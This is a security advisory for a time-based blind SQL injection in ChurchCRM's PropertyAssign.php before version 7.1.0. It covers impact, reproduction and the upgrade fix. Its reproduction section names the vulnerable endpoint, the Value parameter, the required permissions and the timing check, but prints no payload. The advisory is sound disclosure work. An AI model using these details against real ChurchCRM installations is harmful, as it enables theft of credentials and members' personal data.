ChurchCRM Time-Based Blind SQL Injection Vulnerability in PropertyAssign.php Prior to 7.1.0

A time-based blind SQL injection vulnerability has been identified in ChurchCRM versions prior to 7.1.0. This vulnerability allows authenticated users with Edit Records or Manage Groups permissions to exploit the PropertyAssign.php endpoint. The flaw arises from insufficient input sanitization, enabling the exfiltration or modification of any database content, including user credentials, personal identifiable information (PII), and configuration secrets.

Impact

Exploitation of this vulnerability allows for time-based blind SQL injection, where an attacker can exfiltrate or modify database content. This includes the potential to access user credentials and sensitive personal information.

Reproduction

To reproduce this vulnerability, an authenticated user with Edit Records or Manage Groups permissions can send a POST request to the PropertyAssign.php endpoint. The request must include a crafted SQL injection payload in the Value parameter, which exploits the vulnerability by manipulating the SQL query execution. The injection can be verified by observing a delay in the response time, indicating that the injected SQL condition was evaluated as true.

Remediation

Users are advised to update to ChurchCRM version 7.1.0, where this vulnerability has been fixed.